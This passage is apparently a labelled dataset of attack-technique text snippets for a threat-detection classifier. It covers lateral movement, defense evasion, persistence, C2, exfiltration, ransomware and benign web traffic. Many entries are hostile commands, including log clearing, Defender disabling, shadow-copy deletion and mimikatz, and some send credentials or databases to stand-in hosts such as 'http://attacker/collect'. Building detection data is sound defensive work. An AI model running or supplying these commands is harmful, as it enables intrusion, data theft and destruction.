  { text: "schtasks /create /s \\\\host02 remote scheduled task lateral", label: "lateral" },
  { text: "sc \\\\target create svc binpath cmd remote service lateral", label: "lateral" },
  { text: "pass the hash NTLM mimikatz sekurlsa::pth lateral movement", label: "lateral" },
  { text: "rdp mstsc /v:10.0.0.60 remote desktop lateral movement pivot", label: "lateral" },
  { text: "at \\\\host 13:00 cmd legacy remote task lateral movement", label: "lateral" },
  { text: "impacket-smbexec administrator@10.0.0.22 semi-interactive shell", label: "lateral" },
  { text: "dcom mmc20 application lateral movement remote execution", label: "lateral" },
  { text: "winrs -r:srv03 cmd windows remote shell lateral movement", label: "lateral" },
  { text: "ssh pivot tunnel jump host internal network lateral", label: "lateral" },
  { text: "overpass the hash request tgt lateral movement kerberos", label: "lateral" },
  { text: "copy payload.exe \\\\host\\C$\\Windows\\Temp remote admin share", label: "lateral" },
  { text: "wmiexec.py corp/user@10.0.0.31 remote wmi command execution", label: "lateral" },
  { text: "PsExec accepteula \\\\10.0.0.9 -d -c beacon.exe deploy lateral", label: "lateral" },
  { text: "remote service creation sc.exe \\\\srv lateral movement execution", label: "lateral" },
  { text: "kerberos golden ticket lateral movement across domain hosts", label: "lateral" },
  { text: "anydesk unattended access lateral movement remote control abuse", label: "lateral" },
  { text: "smb admin$ c$ ipc$ share access remote host lateral movement", label: "lateral" },
  { text: "Invoke-Command -ComputerName srv04 -ScriptBlock powershell remoting", label: "lateral" },
  { text: "ssh -o StrictHostKeyChecking=no user@10.0.0.70 internal pivot", label: "lateral" },
  { text: "wmic /node:target /user:admin process call create remote exec", label: "lateral" },
  { text: "lateral movement via scheduled task on remote host smb 445", label: "lateral" },

  // --- evasion / 방어 회피·흔적 제거 ---
  { text: "wevtutil cl Security clear windows event log evasion", label: "evasion" },
  { text: "Clear-EventLog -LogName Security powershell log deletion", label: "evasion" },
  { text: "event id 1102 the audit log was cleared defense evasion", label: "evasion" },
  { text: "powershell -nop -w hidden -enc SQBFAFgA encoded command evasion", label: "evasion" },
  { text: "Set-MpPreference -DisableRealtimeMonitoring disable defender", label: "evasion" },
  { text: "sdelete.exe -p 3 secure delete file wiping anti forensics", label: "evasion" },
  { text: "timestomp file modify creation time attribute manipulation", label: "evasion" },
  { text: "del *.evtx remove event log files clear traces evasion", label: "evasion" },
  { text: "history -c bash history clearing anti forensic evasion", label: "evasion" },
  { text: "amsi bypass patch amsiScanBuffer memory antimalware evasion", label: "evasion" },
  { text: "powershell -ep bypass -w hidden execution policy bypass", label: "evasion" },
  { text: "reg add HKLM disable windows defender tamper protection", label: "evasion" },
  { text: "attrib +h +s hide file system attributes defense evasion", label: "evasion" },
  { text: "Invoke-Obfuscation encoded powershell payload evasion", label: "evasion" },
  { text: "certutil -decode encoded.txt payload.exe lolbin evasion", label: "evasion" },
  { text: "bitsadmin /transfer download lolbin proxy execution evasion", label: "evasion" },
  { text: "rundll32 javascript proxy execution defender bypass evasion", label: "evasion" },
  { text: "fltMC unload minifilter driver disable edr sensor evasion", label: "evasion" },
  { text: "Add-MpPreference -ExclusionPath C:\\Temp defender exclusion evasion", label: "evasion" },
  { text: "net stop windefend disable antivirus service evasion", label: "evasion" },
  { text: "clear windows event logs wevtutil cl system application security", label: "evasion" },
  { text: "process hollowing inject code legitimate process evasion", label: "evasion" },
  { text: "msbuild.exe inline task csproj lolbin code execution evasion", label: "evasion" },
  { text: "regsvr32 scrobj.dll squiblydoo bypass application whitelisting", label: "evasion" },
  { text: "powershell FromBase64String iex download cradle obfuscation", label: "evasion" },
  { text: "disable etw event tracing patch ntdll evasion telemetry", label: "evasion" },
  { text: "sc config windefend start= disabled kill defender persistence evasion", label: "evasion" },
  { text: "vssadmin resize shadowstorage minimal anti forensic evasion", label: "evasion" },
  { text: "unhook edr direct syscall ntdll refresh evasion technique", label: "evasion" },
  { text: "schtasks delete forensic artifact removal cover tracks evasion", label: "evasion" },
  { text: "mavinject dll injection lolbin defense evasion process", label: "evasion" },

  // --- persistence / 지속성 확보 ---
  { text: "reg add HKLM Software Microsoft Windows CurrentVersion Run", label: "persistence" },
  { text: "schtasks /create scheduled task autostart persistence", label: "persistence" },
  { text: "new service created svchost autorun boot persistence", label: "persistence" },
  { text: "crontab modified startup script backdoor persistence", label: "persistence" },
  { text: "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v evil", label: "persistence" },
  { text: "schtasks /create /tn Updater /tr backdoor.exe /sc onlogon", label: "persistence" },
  { text: "New-ScheduledTask -Action powershell persistence logon trigger", label: "persistence" },
  { text: "sc create evilsvc binpath= C:\\Temp\\mal.exe start= auto persistence", label: "persistence" },
  { text: "wmi event subscription __EventFilter CommandLineConsumer persistence", label: "persistence" },
  { text: "copy backdoor.exe to startup folder autorun persistence", label: "persistence" },
  { text: "reg add HKLM Run key malware autostart registry persistence", label: "persistence" },
  { text: "sethc.exe accessibility feature debugger hijack persistence", label: "persistence" },
  { text: "golden ticket kerberos long term domain persistence krbtgt", label: "persistence" },
  { text: "systemd service unit /etc/systemd/system/evil.service linux persistence", label: "persistence" },
  { text: ".bashrc modification reverse shell on login persistence linux", label: "persistence" },
  { text: "dll search order hijack persistence load malicious library", label: "persistence" },
  { text: "com hijacking registry inprocserver32 persistence technique", label: "persistence" },
  { text: "ssh authorized_keys added attacker public key persistence", label: "persistence" },
  { text: "BITS job persistence bitsadmin /setnotifycmdline backdoor", label: "persistence" },
  { text: "startup folder shell:startup lnk malware persistence autorun", label: "persistence" },
  { text: "reg add image file execution options debugger persistence", label: "persistence" },
  { text: "scheduled task xml hidden persistence system privileges autorun", label: "persistence" },
  { text: "winlogon shell userinit registry persistence modification", label: "persistence" },
  { text: "cron @reboot backdoor script persistence linux boot", label: "persistence" },
  { text: "skeleton key mimikatz misc::skeleton domain persistence", label: "persistence" },
  { text: "service dll svchost group persistence registry backdoor", label: "persistence" },
  { text: "launchd plist macos persistence login item backdoor", label: "persistence" },
  { text: "appinit_dll registry persistence load dll into processes", label: "persistence" },
  { text: "netsh helper dll persistence registered backdoor autorun", label: "persistence" },
  { text: "powershell profile.ps1 modification persistence on shell start", label: "persistence" },
  { text: "screensaver scrnsave.scr registry persistence execution", label: "persistence" },

  // --- c2 / 명령제어·비콘·RAT ---
  { text: "chaos_server rat beacon command and control channel", label: "c2" },
  { text: "frp plink reverse tunnel to c2 persistent connection", label: "c2" },
  { text: "cobaltstrike beacon http callback jitter sleep", label: "c2" },
  { text: "periodic GET /gate.php beacon check-in implant", label: "c2" },
  { text: "sliver implant mtls beacon command and control encrypted", label: "c2" },
  { text: "havoc demon http beacon c2 sleep obfuscation", label: "c2" },
  { text: "mythic apollo agent websocket command and control", label: "c2" },
  { text: "brute ratel c4 badger beacon edr evasion c2", label: "c2" },
  { text: "meterpreter reverse_https stager metasploit c2 session", label: "c2" },
  { text: "asyncrat client connect c2 port 6606 remote access trojan", label: "c2" },
  { text: "quasar rat command and control remote administration beacon", label: "c2" },
  { text: "remcos rat keylogger c2 dynamic dns persistent connection", label: "c2" },
  { text: "xworm rat c2 beacon plugin loader remote access", label: "c2" },
  { text: "GET /submit.php?id=WIN-abc beacon check-in http c2 implant", label: "c2" },
  { text: "dns tunneling c2 txt record beacon data exfil channel", label: "c2" },
  { text: "periodic http post /api/v1/updates beacon jitter 60s sleep", label: "c2" },
  { text: "domain fronting cdn c2 channel cobalt strike malleable profile", label: "c2" },
  { text: "CHAOSRAT web based remote control c2 chaos_server implant", label: "c2" },
  { text: "empire powershell agent stager c2 http listener beacon", label: "c2" },
  { text: "covenant grunt http c2 dotnet implant command control", label: "c2" },
  { text: "ligolo-ng reverse tunnel c2 pivot socks proxy channel", label: "c2" },
  { text: "beacon.exe smb named pipe c2 peer to peer lateral", label: "c2" },
  { text: "dcrat plugin remote access trojan c2 command execution", label: "c2" },
  { text: "sectoprat c2 hidden vnc remote desktop beacon channel", label: "c2" },
  { text: "ngrok tunnel expose internal service c2 reverse connection", label: "c2" },
  { text: "gost tunnel socks5 relay c2 traffic obfuscation channel", label: "c2" },
  { text: "websocket beacon /ws c2 real time command channel implant", label: "c2" },
  { text: "sliver http c2 profile jitter sleep interval beacon callback", label: "c2" },
  { text: "agent tesla smtp c2 exfil stolen credential beacon", label: "c2" },
  { text: "EtherRat TukTuk c2 beacon 2026 gentleman ransomware precursor", label: "c2" },
  { text: "malleable c2 profile mimic jquery cdn beacon http traffic", label: "c2" },

  // --- exfil / 데이터 유출 ---
  { text: "curl --upload-file dump.zip to external host exfiltration", label: "exfil" },
  { text: "POST large body 50MB outbound transfer data staged", label: "exfil" },
  { text: "scp archive.tar.gz attacker server data theft", label: "exfil" },
  { text: "GET /download backup.sql exfiltrate database to remote", label: "exfil" },
  { text: "rclone copy /data remote:mega cloud storage exfiltration", label: "exfil" },
  { text: "rclone sync C:\\finance mega:backup data exfil cloud", label: "exfil" },
  { text: "7z a -p archive.7z sensitive_docs stage compress exfil", label: "exfil" },
  { text: "curl -X POST -F file=@ntds.dit http://c2/upload exfiltration", label: "exfil" },
  { text: "dns exfiltration base64 chunks subdomain queries data theft", label: "exfil" },
  { text: "wget --post-file=passwords.txt http://attacker/collect exfil", label: "exfil" },
  { text: "powershell Invoke-WebRequest -Method PUT -InFile data.zip c2 exfil", label: "exfil" },
  { text: "staged zip archive in temp then upload to dropbox exfiltration", label: "exfil" },
  { text: "large outbound transfer 2GB to unfamiliar external ip data leak", label: "exfil" },
  { text: "mega.nz upload stolen customer database records exfiltration", label: "exfil" },
  { text: "icmp tunnel exfiltrate data ping payload covert channel", label: "exfil" },
  { text: "ftp put confidential.xlsx external server data exfiltration", label: "exfil" },
  { text: "GET /api/export?all=true bulk data download exfiltration", label: "exfil" },
  { text: "aws s3 cp secrets s3://attacker-bucket cloud exfil transfer", label: "exfil" },
  { text: "compress collect documents pictures archive stage exfil c2", label: "exfil" },
  { text: "telegram bot api sendDocument exfiltrate stolen files channel", label: "exfil" },
  { text: "smtp send email attachment sensitive data exfiltration", label: "exfil" },
  { text: "pastebin upload dumped credentials text data exfiltration", label: "exfil" },
  { text: "ssh reverse tunnel scp bulk file transfer external exfil", label: "exfil" },
  { text: "webdav PUT large archive external server data exfiltration", label: "exfil" },
  { text: "github gist upload stolen source code exfil private data", label: "exfil" },
  { text: "nc attacker 4444 < database.dump netcat exfiltration transfer", label: "exfil" },
  { text: "exfiltrate over c2 channel encrypted chunks beacon data theft", label: "exfil" },
  { text: "copy staged data \\\\external share bulk exfiltration outbound", label: "exfil" },
  { text: "curl -T customers.csv sftp://evil upload exfiltrate records", label: "exfil" },
  { text: "discord webhook post stolen tokens files exfiltration channel", label: "exfil" },
  { text: "clipboard keylog data staged compressed archive exfil upload", label: "exfil" },

  // --- ransomware / 랜섬웨어·파괴 ---
  { text: "files renamed .locked .encrypted extension ransomware", label: "ransomware" },
  { text: "ransom note readme_decrypt.txt dropped every folder", label: "ransomware" },
  { text: "vssadmin delete shadows /all /quiet inhibit recovery ransomware", label: "ransomware" },
  { text: "bcdedit /set recoveryenabled no disable recovery ransomware", label: "ransomware" },
  { text: "mass file encryption .lockbit extension ransom demand", label: "ransomware" },
  { text: "wmic shadowcopy delete remove volume shadow copies ransomware", label: "ransomware" },
  { text: "cipher /w wipe free space anti recovery ransomware", label: "ransomware" },
  { text: "lockbit 3.0 ransomware encrypt drives ransom note bitcoin", label: "ransomware" },
  { text: "blackcat alphv ransomware rust encrypt exfil double extortion", label: "ransomware" },
  { text: "akira ransomware .akira extension encrypt vmware esxi", label: "ransomware" },
  { text: "play ransomware intermittent encryption .play extension", label: "ransomware" },
  { text: "cl0p ransomware moveit exploit mass encryption extortion", label: "ransomware" },
  { text: "royal ransomware partial encryption ransom note readme", label: "ransomware" },
  { text: "black basta ransomware encrypt network shares ransom demand", label: "ransomware" },
  { text: "taskkill /f /im sql.exe stop services before encryption ransomware", label: "ransomware" },
  { text: "wbadmin delete catalog inhibit system recovery ransomware", label: "ransomware" },
  { text: "note HOW_TO_DECRYPT.html payment tor onion ransomware", label: "ransomware" },
  { text: ".encrypted appended to documents photos databases ransomware", label: "ransomware" },
  { text: "gentleman ransomware 2026 etherrat precursor encrypt payload", label: "ransomware" },
  { text: "rclone exfil then encrypt double extortion ransomware leak site", label: "ransomware" },
  { text: "esxi vmdk encryption ransomware esxcli vm kill encrypt", label: "ransomware" },
  { text: "fsutil usn deletejournal delete journal anti forensic ransomware", label: "ransomware" },
  { text: "shadow copy deletion vssadmin resize ransomware recovery inhibit", label: "ransomware" },
  { text: "ransomware drops wallpaper change ransom message all files locked", label: "ransomware" },
  { text: "mass rename encrypt aes rsa hybrid ransom payment bitcoin", label: "ransomware" },
  { text: "net stop backup service disable defender then encrypt ransomware", label: "ransomware" },
  { text: "phobos ransomware smb spread encrypt .phobos extension ransom", label: "ransomware" },
  { text: "wannacry style worm smb encrypt propagate ransom bitcoin", label: "ransomware" },
  { text: "data destruction wiper malware overwrite mbr disk ransom fake", label: "ransomware" },
  { text: "ryuk conti heir ransomware encrypt domain wide deployment", label: "ransomware" },
  { text: "GlobeImposter ransom note extension encrypt files decrypt fee", label: "ransomware" },

  // --- benign / 정상 트래픽 ---
  { text: "GET / 200 Mozilla normal homepage visit", label: "benign" },
  { text: "GET /dashboard 200 authenticated user session", label: "benign" },
  { text: "GET /style.css 200 static asset cache", label: "benign" },
  { text: "GET /favicon.ico 200 browser request", label: "benign" },
  { text: "POST /api/login 200 success valid user token", label: "benign" },
  { text: "GET /images/logo.png 200 content delivery", label: "benign" },
  { text: "GET /health 200 monitoring probe uptime", label: "benign" },
  { text: "GET /products 200 catalog browse ok", label: "benign" },
  { text: "GET /api/user/profile 200 authenticated json response", label: "benign" },
  { text: "GET /assets/app.js 200 javascript bundle cached", label: "benign" },
  { text: "GET /about 200 normal page view chrome browser", label: "benign" },
  { text: "POST /api/cart/add 200 add item shopping cart success", label: "benign" },
  { text: "GET /fonts/roboto.woff2 200 web font static resource", label: "benign" },
  { text: "sshd Accepted publickey for deploy from 10.0.0.5 port 22", label: "benign" },
  { text: "GET /blog/post/123 200 article read normal traffic", label: "benign" },
  { text: "GET /robots.txt 200 googlebot legitimate crawler", label: "benign" },
  { text: "POST /api/checkout 200 order placed payment success", label: "benign" },
  { text: "GET /search?q=laptop 200 product search normal query", label: "benign" },
  { text: "GET /api/v1/orders 200 authenticated api pagination", label: "benign" },
  { text: "GET /sitemap.xml 200 bingbot search engine indexing", label: "benign" },
  { text: "cron daily backup job completed successfully 0 errors", label: "benign" },
  { text: "GET /contact 200 form page load normal user", label: "benign" },
  { text: "GET /css/theme.css 200 stylesheet 304 not modified cache", label: "benign" },
  { text: "POST /api/logout 200 session ended user signed out", label: "benign" },
  { text: "GET /docs/getting-started 200 documentation page view", label: "benign" },
  { text: "GET /api/status 200 healthcheck load balancer probe ok", label: "benign" },
  { text: "nginx access 200 GET /index.html safari mobile user", label: "benign" },
  { text: "GET /images/banner.jpg 200 cdn cached image delivery", label: "benign" },
  { text: "systemd started nginx service normal boot no error", label: "benign" },
  { text: "GET /account/settings 200 authenticated profile update view", label: "benign" },
  { text: "POST /api/comments 200 user posted comment moderated ok", label: "benign" },
  { text: "GET /videos/intro.mp4 206 partial content range request stream", label: "benign" },
];
